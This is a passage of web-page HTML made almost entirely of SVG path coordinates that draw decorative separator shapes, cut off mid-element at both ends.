d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.